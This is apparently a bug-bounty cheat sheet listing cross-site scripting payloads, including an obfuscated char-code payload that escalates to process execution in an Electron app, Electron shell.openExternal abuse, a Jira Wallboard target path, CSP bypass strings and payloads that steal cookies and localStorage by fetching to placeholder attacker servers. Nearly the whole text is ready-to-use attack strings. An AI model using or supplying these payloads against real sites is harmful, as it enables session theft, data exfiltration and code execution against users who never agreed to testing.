XSS to RCE payload:
">'><img src=x onerror=writeln(String.fromCharCode(60,115,99,114,105,112,116,62,10,118,97,114,32,80,114,111,99,101,115,115,32,61,32,112,114,111,99,101,115,115,46,98,105,110,100,105,110,103,40,39,112,114,111,99,101,115,115,95,119,114,97,112,39,41,46,80,114,111,99,101,115,115,59,10,118,97,114,32,112,114,111,99,32,61,32,110,101,119,32,80,114,111,99,101,115,115,40,41,59,10,112,114,111,99,46,111,110,101,120,105,116,32,61,32,102,117,110,99,116,105,111,110,40,97,44,98,41,32,123,125,59,10,118,97,114,32,101,110,118,32,61,32,112,114,111,99,101,115,115,46,101,110,118,59,10,118,97,114,32,101,110,118,95,32,61,32,91,93,59,10,102,111,114,32,40,118,97,114,32,107,101,121,32,105,110,32,101,110,118,41,32,101,110,118,95,46,112,117,115,104,40,107,101,121,43,39,61,39,43,101,110,118,91,107,101,121,93,41,59,10,112,114,111,99,46,115,112,97,119,110,40,123,102,105,108,101,58,39,47,117,115,114,47,98,105,110,47,103,110,111,109,101,45,99,97,108,99,117,108,97,116,111,114,39,44,99,119,100,58,110,117,108,108,44,119,105,110,100,111,119,115,86,101,114,98,97,116,105,109,65,114,103,117,109,101,110,116,115,58,102,97,108,115,101,44,100,101,116,97,99,104,101,100,58,102,97,108,115,101,44,101,110,118,80,97,105,114,115,58,101,110,118,95,44,115,116,100,105,111,58,91,123,116,121,112,101,58,39,105,103,110,111,114,101,39,125,44,123,116,121,112,101,58,39,105,103,110,111,114,101,39,125,44,123,116,121,112,101,58,39,105,103,110,111,114,101,39,125,93,125,41,59,10,60,47,115,99,114,105,112,116,62))>
Same RCE:
<a onmouseover="try{ const {shell} = require('electron'); shell.openExternal('file:C:/Windows/System32/calc.exe') }catch(e){alert(e)}">Harmless Link</a>
<script+class=whoami>window.open("Calculator:///");</script>
Jira XSS bug: check Wallboard in recon
victimhost/plugins/servlet/Wallboard
saki'"><svg><animatetransform src=x onbegin=alert(1)>
'"><svg><animate onbegin=alert(document.domain) attributeName=x></svg>
<math href="javascript:alert(document.cookie)">CLICKME</math>
script><svg/onload=prompt`{document.cookie}`>
HTML injection:
</h1><h3><mark><a href="https://example.com">e x a m p l e . c o m </a></mark></h3>
<a href=[0x0b]xss" onfocus=prompt(1) autofocus fragment="
Bug Bounty Tips:
Here is an XSS payload that steals both cookies and local storage data:
<svg/onload='const url = `https://yourserver/collect?cookie=${encodeURIComponent(document.cookie)}&localStorage=${encodeURIComponent(JSON.stringify(localStorage))}`; fetch(url);'>"
Bug: XSS to information disclosure.
I have used a double URL-encoded version of this payload:
<img src="x" onerror="fetch('http://yourserver/?cookie=' + encodeURIComponent(document.cookie));">
CSP BYPASS:
%3C/script%20%3E
2- mitsecXSS%22%3E%3Cinput%20%00%20onControl%20hello%20oninput=confirm(1)%20x%3E
challenge-0622.intigriti.io/challenge/index.php
'">👉<a/href='jav	ascript:throw/lauritz/'>click<!--
<a/href="javascript:alert(document.cookie)">ClickMe
'"><img src=x onerror=fetch('//ra54f7ltuq8q8i7ym90odj9zgqmga5.burpcollaborator.net/?c='%2Bdocument.cookie)>
?url=http://me6.com/aem/xss2.svg
My fav bypass XSS payload, works 99% of the time:
'"()%26%25<yes><%2Fscript><script>alert(document.c00kiE)<%2Fscript>